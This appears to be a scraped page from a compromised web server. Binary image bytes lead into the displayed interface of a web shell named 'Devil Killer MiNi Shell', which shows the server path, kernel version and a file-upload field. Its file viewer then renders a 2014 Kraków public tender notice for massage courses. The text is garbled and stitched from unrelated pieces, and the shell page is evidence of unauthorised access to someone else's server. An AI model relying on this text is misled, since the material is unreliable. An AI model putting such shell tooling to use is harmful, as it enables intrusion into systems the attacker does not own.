JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140911/302442-N-2014.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia kursów w masażu
 w ramach realizacji projektu Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 302442 - 2014; data zamieszczenia: 11.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 644 28 72; 12 644 28 71, faks 12 644 99 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zjewm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia kursów w masażu
 w ramach realizacji projektu Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/.Przedmiotem niniejszego zamówienia jest usługa polegająca na organizacji 
i przeprowadzeniu kursów w masażu: Taping jako terapia wspomagająca tradycyjne metody usprawniania, Anatomy Trains oraz Refleksoterapia stóp dla uczniów i uczennic Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86,    30-079 Kraków w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce,  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

2/.W ramach realizacji przedmiotu zamówienia do obowiązków Wykonawcy należy zorganizowanie kursów w masażu według programu określonego przez Zamawiającego.


3/.Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania

Przedmiotem I części zamówienia jest organizacja i przeprowadzenie kursu 
w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania. 
Kurs w ramach I części zamówienia będzie realizowany w dwóch etapach.

Liczba uczestników: 
W kursie w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu : 
W trakcie kursu zostanie zrealizowanych 16 godzin zajęć dla jednej grupy (4 godziny zajęć teoretycznych, 12 godzin zajęć praktycznych) czyli łącznie dla 3 grup: 48 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 8 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach,            
w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 48 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące. 
Kurs realizowany będzie w dwóch etapach:
a.	etap I do 08 grudnia 2014r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 16 godzin kursu dla 1 grupy uczniów, 
b.	etap II od 1 marca do 10 maja 2015r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 32 godzin kursu dla 2 grup uczniów.                       

Termin realizacji: listopad 2014r. - 10 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:
Filozofia, zasady główne, diagnostyka i techniki kinesiology tapingu, zdobycie umiejętności testowania powięzi mięśniowych, diagnozowanie zaburzeń w układzie ruchu, omówienie oraz nabycie umiejętności aplikacji technik mięśniowej, korekcyjnej, powięziowej, więzadłowej, funkcjonalnej i limfatycznej, problemy funkcjonalne w obrębie kręgosłupa: szyjnego, piersiowego, lędźwiowego, lędźwiowo - krzyżowego, kończyn górnych i kończyn dolnych.
Podczas kursu należy wykorzystać zakupiony Atlas anatomii człowieka Nettera. Polskie mianownictwo anatomiczne  celem lepszego przyswajania, zapamiętywania i utrwalania nabywanej wiedzy.

Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego 
i materiałów: Wykonawca dostarczy w ramach realizacji kursu: plastry sztuk 60 (2 rolki plastrów na ucznia do wykorzystania na kursie oraz reszta na własność kursanta), nożyczki sztuk 10 (materiały te nie stanowią własności kursantów), 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zakup 2 sztuk pozycji: Atlas anatomii człowieka Nettera. Polskie mianownictwo anatomiczne, F.H.Netter e - book EPUB, które po zakończeniu kursu przechodzą na własność Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
d.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
e.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
f.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
g.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału 
w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników kursu  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT. 

4.Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Anatomy Trains

Przedmiotem II części zamówienia jest organizacja i przeprowadzenie kursu 
w masażu Anatomy Trains. 
Kurs w ramach II części zamówienia będzie realizowany w dwóch etapach.

Liczba uczestników: 
W kursie w masażu Anatomy Trains weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu: 
W trakcie kursu zostanie zrealizowanych 20 godzin zajęć dla jednej grupy (9 godzin zajęć teoretycznych, 11 godzin zajęć praktycznych) czyli łącznie dla 3 grup: 60 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 10 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 60 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące. 
Kurs realizowany będzie w dwóch etapach:
a.	etap I do 08 grudnia 2014r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 20 godzin kursu dla 1 grupy uczniów, 
b.	etap II od 1 marca do 10 maja 2015r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 40 godzin kursu dla 2 grup uczniów.                      

Termin realizacji: listopad 2014r. - 10 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu 
z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:

Część teoretyczna powinna obejmować historię i podstawowe pojęcia koncepcji Anatomy Trains, omówienie budowy i właściwości powięzi, Body Reading - terminologię i zastosowanie, przebieg i funkcje taśm: powierzchownej tylnej, powierzchownej przedniej, bocznej, spiralnej, ramienia, funkcjonalnej i głębokiej przedniej. 
Ćwiczenia praktyczne powinny obejmować techniki uwalniania powięziowego wybranych mięśni w obrębie taśm: powierzchownej tylnej, powierzchownej przedniej, bocznej, spiralnej, ramienia, funkcjonalnej i głębokiej przedniej.


Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego 
i materiałów: Wykonawca dostarczy w ramach realizacji kursu środki poślizgowe w ilości wystarczającej na realizację kursu dla 30 osób, model układu kostnego człowieka (szkielet) - materiały te nie stanowią własności kursantów, 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
d.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
e.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
f.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału 
w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT.

5.Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Refleksoterapia stóp

Przedmiotem III części zamówienia jest organizacja i przeprowadzenie kursu 
w  masażu Refleksoterapia stóp.

Liczba uczestników: 
W kursie w masażu Refleksoterapia stóp weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu: 
W trakcie kursu zostanie zrealizowanych 15 godzin zajęć dla jednej grupy (3 godziny zajęć teoretycznych, 12 godzin zajęć praktycznych), czyli łącznie dla 3 grup: 45 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 8 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach,  w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 45 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące - 3 grupy po 10 osób, 15 godzin kursu dla jednej grupy.
                      
Termin realizacji: luty 2015r. - 24 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu 
z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:
Historia i teoria refleksologii, koncepcja krążenia energii w ludzkim ciele, zasady refleksoterapii, zasady i metodyka zabiegu, wskazania i przeciwwskazania do zabiegu, podział stopy na strefy, wyznaczanie linii osi, odnajdowanie poszczególnych punktów refleksologicznych.

Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego i materiałów: Wykonawca dostarczy w ramach realizacji kursu: oliwki do masażu, ręczniki i prześcieradła jednorazowe, płyny do dezynfekcji w ilości wystarczającej do przeprowadzenia kursu dla 30 osób (materiały te nie stanowią własności kursantów), 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
d.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
e.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
f.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej po jednej osobie do każdego z trzech rodzajów kursu w masażu tj. Taping jako terapia wspomagająca tradycyjne metody usprawniania, Anatomy Trains i Refleksoterapia stóp posiadającej:a/. w zakresie kursu Taping jako terapia wspomagająca tradycyjne metody usprawniania wykształcenie wyższe magisterskie w zakresie fizjoterapii, ukończony kurs rozwijający z tapingu i co najmniej 2 letnie doświadczenie zawodowe w diagnostyce i terapii schorzeń narządu ruchu, realizowane w centrach rehabilitacji oraz doświadczenie praktyczne polegające na zrealizowaniu co najmniej jednego szkolenia z zakresu tapingu z udziałem osób niewidomych i słabowidzących.
b/. w zakresie kursu Anatomy Trains uprawnienia trenerskie z zakresu anatomy trains,
c/. w zakresie kursu Refleksoterapia stóp minimum 2 letnie doświadczenie zawodowe w technice masażu, którą będzie realizować w ramach zamówienia 
i przeprowadzenie co najmniej 50 godzin szkoleń z w/w zakresu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program kursu dla wybranej części zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy. 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zjewm.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
